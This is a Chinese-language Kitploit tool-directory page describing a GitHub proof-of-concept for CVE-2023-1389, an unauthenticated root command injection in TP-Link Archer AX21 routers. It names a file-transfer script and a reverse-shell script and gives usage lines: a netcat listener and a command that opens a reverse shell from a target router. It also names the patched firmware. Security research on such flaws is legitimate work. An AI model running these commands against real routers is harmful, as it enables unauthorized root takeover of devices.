Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-1389 — CVE-2023-1389 的概念验证脚本,针对 TP-Link Archer AX21 中的未认证命令注入漏洞,提供文件传输和反向 Shell 功能。 | Kitploit
工具/GitHubGitHub/voyag3r-security/cve-2023-1389
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHubvoyag3r-security/cve-2023-1389

CVE-2023-1389

CVE-2023-1389 的概念验证脚本,针对 TP-Link Archer AX21 中的未认证命令注入漏洞,提供文件传输和反向 Shell 功能。

查看仓库
17743年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

描述

CVE-2023–1389 是 TP-Link Archer AX21 WiFi 路由器中的一个无需身份验证的命令注入漏洞。country 参数中的一个回调使用了 popen() 函数,该函数以 root 权限运行,从而允许攻击者通过向管理界面发送 GET 或 POST 请求注入任意值,而无需身份验证。有关该漏洞的更多详细信息,请参见此处。

这些是我在探索该命令注入时创建的几个概念验证(PoC)脚本。Archer-file-transfer.py 是第一个迭代版本,其实现交互的方式相当复杂。Archer-rev-shell.py 为你提供了一个简单的 netcat 反向 shell,很可能正是你所需要的那个。如果你想进一步了解这些脚本的开发过程,可以阅读此处的文章。

用法

在一个终端窗口中:

root@kitploit:~
nc your_IP listener_port

在第二个终端窗口中:

root@kitploit:~
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port

缓解措施

TP-Link 已发布固件版本 1.1.4 Build 20230219,通过移除易受攻击的回调来修复该问题。将路由器更新到最新固件可保护你的设备。

未来

我可能不会维护这些 PoC。这两个脚本都非常简单,应该可以根据需要轻松修改。

下载工具